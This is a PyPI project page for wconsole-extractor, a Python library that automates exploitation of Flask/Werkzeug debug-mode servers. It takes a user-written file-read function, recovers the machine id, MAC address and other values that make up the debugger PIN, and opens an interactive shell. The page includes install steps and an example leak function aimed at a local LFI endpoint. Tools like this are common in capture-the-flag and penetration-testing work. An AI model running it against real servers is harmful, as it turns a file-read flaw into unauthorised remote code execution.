Skip to main content

No project description provided

Project description

Welcome to WConsole Extractor 👋

Version License: MIT Twitter: Ruulian_

Wconsole Extractor is a library which allows to automatically exploit a flask debug mode server. You just need to write a file leak function, pass it to the class WConsoleExtractor constructor and you can access to all the elements related to the debug mode. Moreover, you can call the shell function to obtain an interactive shell.

✨ Demo

example_gif

🔨 Install

From PyPi

Global installation:

pip3 install wconsole-extractor

Python virtual environment:

python3 -m venv env
source env/bin/activate
pip3 install wconsole-extractor

# Deactivate environment
deactivate

Installation from repository

Global installation:

git clone https://github.com/Ruulian/wconsole_extractor.git
cd wconsole_extractor
pip3 install .

Python virtual environment:

git clone https://github.com/Ruulian/wconsole_extractor.git
cd wconsole_extractor
python3 -m venv env
source env/bin/activate
pip3 install .

# Deactivate environment
deactivate

📚 Documentation

Note: The target operating system must be a Linux distribution.

Prerequisites

In order to use correctly the library, you need to have an arbitrary file read on the target and implement it in python.

You must write a function that takes a filename as parameter and returns the content of the file on the target. If the file is not found, the function should return an empty string.

Available attributes

From WconsoleExtractor instance, you can access mutiple attributes:

# Target information
extractor.target               # Specified target
extractor.base_url             # Target base url
extractor.hostname             # hostname

# Versions
extractor.python_version       # Python version
extractor.werkzeug_version     # Werkzeug version

# Probably public bits
extractor.username             # User who launched the application
extractor.flask_path           # Flask installation path
extractor.modname              # Constant "flask.app"
extractor.class_name           # Constant "Flask"
extractor.probably_public_bits # Probably public bits [username, modname, class_name, flask_path]

# Private bits
extractor.machine_id           # Machine id
extractor.uuidnode             # MAC address in decimal
extractor.private_bits         # private bits

# Post process information
extractor.pin_code             # Werkzeug PIN CODE
extractor.token                # Werkzeug console token (available in HTML source code)

# Functions
extractor.shell()              # Get interactive shell

Example

from wconsole_extractor import WConsoleExtractor, info
import requests

def leak_function(filename) -> str:
    r = requests.get(f"http://localhost:5000/lfi?path={filename}")
    if r.status_code == 200:
        return r.text
    else:
        return ""

extractor = WConsoleExtractor(
    target="http://localhost:5000",
    leak_function=leak_function
)


info(f"PIN CODE: {extractor.pin_code}")
extractor.shell()

Author

👤 Ruulian

🤝 Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.

Show your support

Give a ⭐️ if this project helped you!

📝 License

This project is MIT licensed.


This README was generated with ❤️ by readme-md-generator

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

wconsole_extractor-1.0.1.tar.gz (7.6 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

wconsole_extractor-1.0.1-py3-none-any.whl (8.0 kB view details)

Uploaded Python 3

File details

Details for the file wconsole_extractor-1.0.1.tar.gz.

File metadata

  • Download URL: wconsole_extractor-1.0.1.tar.gz
  • Upload date:
  • Size: 7.6 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/5.0.0 CPython/3.12.3

File hashes

Hashes for wconsole_extractor-1.0.1.tar.gz
Algorithm Hash digest
SHA256 e16b9ed0277795dffe827db5ff400eca449bb1ffc8f731c9703c75d2cc946996
MD5 a4dd76d201b7622952840aa952180de4
BLAKE2b-256 69d0780b8de7b0033e57d4b119b48b50c346773dff6bd3ba9a3de6e49036074f

See more details on using hashes here.

File details

Details for the file wconsole_extractor-1.0.1-py3-none-any.whl.

File metadata

File hashes

Hashes for wconsole_extractor-1.0.1-py3-none-any.whl
Algorithm Hash digest
SHA256 4bb61559099a7277bfa2315ac076768c1a5ff38a43b25fbbd621e517feac1434
MD5 33443b33cf46f61a42d692a9d9f7351c
BLAKE2b-256 54d3066224f35116024c23fa4cc036cde14aa019fe66731fc67e5b1059955b52

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page